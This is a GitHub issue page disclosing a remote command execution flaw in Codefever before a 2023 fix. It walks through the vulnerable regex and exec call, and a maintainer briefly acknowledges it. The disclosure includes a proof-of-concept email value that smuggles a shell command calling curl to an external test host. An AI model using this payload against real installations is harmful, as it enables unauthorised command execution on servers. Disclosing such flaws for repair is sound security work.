The Codefeve before 2023.2.7-b1c2e7f has a Remote Command Execute Vulnerability #140
Labels
Comments
|
@youyou-pm10 您反馈的问题已经收到,我们会在下次更新时修复此问题。 |
cubicwork
added a commit
that referenced
this issue
Feb 13, 2023
cubicwork
referenced
this issue
Feb 13, 2023
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
List of Vulnerable path
Vulnerable path /application/controllers/api/user.php
Vulnerable path /application/libraries/service/Network/Request.php
The process of code audit
The $email is from Request::parse().
Lines 44-56 of the "Request.php" show us that we can input any data.
Lines 294-295 of the "user.php" use a vulnerable regular expression because there is no backslash in front of the dot,the dot can match anything.
Then,the email income the EmailSender::send()
Let us check the function.
We can exploit function "exec" to Remote Code Execute.
Vulnerability exploitation process:
Register and login.
Input the POC.
We can check 'result.txt' and decode it.
POC code:
youyou@qq.com'xx|curl test.server.com;xx'xxYour exp should be in test.server.com.We can execute any remote command.
The text was updated successfully, but these errors were encountered: